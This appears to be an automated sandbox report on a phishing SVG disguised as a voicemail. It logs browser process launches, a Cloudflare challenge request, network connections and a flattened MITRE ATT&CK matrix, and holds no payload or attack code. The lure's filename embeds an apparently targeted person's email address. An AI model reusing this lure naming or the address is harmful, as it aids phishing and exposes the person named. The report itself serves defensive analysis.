          Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/570593096:1741829356:PhCNM-6kz2lV6HRsRphjeo5kJCAu4Jn7jqK5hS8mDrM/91f82733ee52f859/WuS3.S6KIdJNgvhLTtH_j5wb5BxqBoQSXQOpo1Jmmg4-1741833485-1.1.1.1-MBoboxuaZC0tZLADIr9lLS9QYxeY1VmhddzFO3C7Npp84kewh0EodxNh4Cj0JRC5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3385sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: WuS3.S6KIdJNgvhLTtH_j5wb5BxqBoQSXQOpo1Jmmg4-1741833485-1.1.1.1-MBoboxuaZC0tZLADIr9lLS9QYxeY1VmhddzFO3C7Npp84kewh0EodxNh4Cj0JRC5cf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 02:38:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55494
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55493
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 55498 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 55494 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55498
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55493 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7948_1329143299Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7948_1329143299Jump to behavior
          Source: classification engineClassification label: mal80.phis.winSVG@25/26@30/13
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,7418917361889980763,10513141320866540213,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2196 /prefetch:3
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,7418917361889980763,10513141320866540213,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2196 /prefetch:3Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid AccountsWindows Management Instrumentation1
          Browser Extensions          		1
          Process Injection          		1
          Masquerading          		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Scripting          		Boot or Logon Initialization Scripts1
          Process Injection          		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information          		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          File Deletion          		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer          		Traffic DuplicationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.